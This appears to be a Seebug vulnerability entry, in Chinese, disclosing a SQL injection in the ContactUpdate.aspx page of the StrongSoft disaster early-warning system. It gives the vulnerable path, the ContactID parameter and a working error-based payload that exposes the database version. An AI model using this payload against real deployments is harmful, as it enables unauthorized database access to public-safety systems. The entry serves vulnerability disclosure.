StrongSoft灾害预警系统ContactUpdate.aspx ContactID参数SQL注入漏洞

2016-01-25T00:00:00
ID SSV:90611
Type seebug
Reporter 哆啦A梦
Modified 2016-01-25T00:00:00

Description

``` 注入链接:/Duty/MailList/ContactUpdate.aspx

注入参数:ContactID

Payload:ContactID=-1+and+1=@@version ``` ![](https://images.seebug.org/contribute/dfa01867-80ae-41fc-b12d-dea60224cf95-屏幕快照 2016-01-15 下午10.34.00.png)![](https://images.seebug.org/contribute/9c6bebb3-c51f-4bd8-b935-7a17ceacb157-屏幕快照 2016-01-15 下午10.35.34.png)![](https://images.seebug.org/contribute/ebd150d7-d179-49b7-ade0-a09844a8acef-屏幕快照 2016-01-15 下午10.35.48.png)